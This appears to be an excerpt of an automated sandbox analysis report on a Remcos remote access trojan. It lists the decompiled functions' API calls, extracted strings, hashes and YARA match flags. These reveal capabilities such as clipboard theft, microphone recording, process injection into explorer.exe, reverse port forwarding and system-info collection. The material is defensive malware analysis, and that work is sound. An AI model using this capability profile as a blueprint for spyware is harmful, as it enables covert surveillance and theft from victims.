                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32 ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32 ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                • Opcode Fuzzy Hash: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                APIs
                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                • API String ID: 1704390241-2575729100
                                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                • String ID: !D@
                                                                • API String ID: 2172192267-604454484
                                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                APIs
                                                                • _free.LIBCMT ref: 100059EA
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100059F6
                                                                • _free.LIBCMT ref: 10005A01
                                                                • _free.LIBCMT ref: 10005A0C
                                                                • _free.LIBCMT ref: 10005A17
                                                                • _free.LIBCMT ref: 10005A22
                                                                • _free.LIBCMT ref: 10005A2D
                                                                • _free.LIBCMT ref: 10005A38
                                                                • _free.LIBCMT ref: 10005A43
                                                                • _free.LIBCMT ref: 10005A51
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                APIs
                                                                • _free.LIBCMT ref: 004481B5
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004481C1
                                                                • _free.LIBCMT ref: 004481CC
                                                                • _free.LIBCMT ref: 004481D7
                                                                • _free.LIBCMT ref: 004481E2
                                                                • _free.LIBCMT ref: 004481ED
                                                                • _free.LIBCMT ref: 004481F8
                                                                • _free.LIBCMT ref: 00448203
                                                                • _free.LIBCMT ref: 0044820E
                                                                • _free.LIBCMT ref: 0044821C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventinet_ntoa
                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                • API String ID: 3578746661-3604713145
                                                                • Opcode ID: 1efd99210e2b95a1e03b3f4f55847fbb21692ead69661ddd0a14b43710662fd5
                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                • Opcode Fuzzy Hash: 1efd99210e2b95a1e03b3f4f55847fbb21692ead69661ddd0a14b43710662fd5
                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                • API String ID: 1462127192-2001430897
                                                                • Opcode ID: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                • Opcode Fuzzy Hash: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                • API String ID: 2050909247-4242073005
                                                                • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                APIs
                                                                • _strftime.LIBCMT ref: 00401D50
                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                • API String ID: 3809562944-243156785
                                                                • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                • int.LIBCPMT ref: 00410EBC
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 3815856325-2015055088
                                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                • waveInStart.WINMM ref: 00401CFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                • String ID: dMG$|MG$PG
                                                                • API String ID: 1356121797-532278878
                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                • DispatchMessageA.USER32 ref: 0041D584
                                                                • GetMessageA.USER32 ref: 0041D591
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID: Remcos
                                                                • API String ID: 1970332568-165870891
                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                • __freea.LIBCMT ref: 00454083
                                                                • __freea.LIBCMT ref: 0045408F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                • String ID:
                                                                • API String ID: 201697637-0
                                                                • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                • _free.LIBCMT ref: 00445515
                                                                • _free.LIBCMT ref: 0044552E
                                                                • _free.LIBCMT ref: 00445560
                                                                • _free.LIBCMT ref: 00445569
                                                                • _free.LIBCMT ref: 00445575
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                • String ID: C
                                                                • API String ID: 1679612858-1037565863
                                                                • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tcp$udp
                                                                • API String ID: 0-3725065008
                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
